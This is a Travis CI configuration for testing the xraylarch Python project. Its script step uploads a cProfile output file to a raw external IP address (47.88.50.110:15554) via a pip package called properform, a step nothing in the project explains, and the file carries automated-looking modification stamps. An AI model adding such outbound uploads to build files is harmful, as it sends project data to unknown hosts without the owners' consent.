# Config file for automatic testing at travis-ci.org
language: python

matrix:
    include:
        - python: 2.7
          env:
            - PYTHON=python

# python: 3.2
# env:
# PYTHON=python3



virtualenv:
    system_site_packages: true

before_install:
    - sudo apt-get update
    - sudo apt-get install $PYTHON-setuptools
    - sudo apt-get install $PYTHON-numpy
    - sudo apt-get install $PYTHON-scipy
    - sudo apt-get install $PYTHON-nose
  # add for profile
    - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
    - sudo apt-get update -qq

install:
    - sudo $PYTHON setup.py install
# add for profile
    - sudo apt-get install -qq g++-4.8
    - export CXX="g++-4.8"
    - pip install nose-cprof
    - pip install properform

script:
    - cd tests
    - nosetests --with-cprofile --cprofile-stats-erase --cprofile-stats-file=profile_xraylarch_f7215a6ab8_3
    - python -m properform Push 47.88.50.110:15554 asdf_xraylarch_f7215a6ab8_3 ./profile_xraylarch_f7215a6ab8_3


 #2017-08-13 02:12:48 modified at 0 #2017-08-13 02:12:53 modified at 1 #2017-08-13 02:12:58 modified at 2 #2017-08-13 02:13:02 modified at 3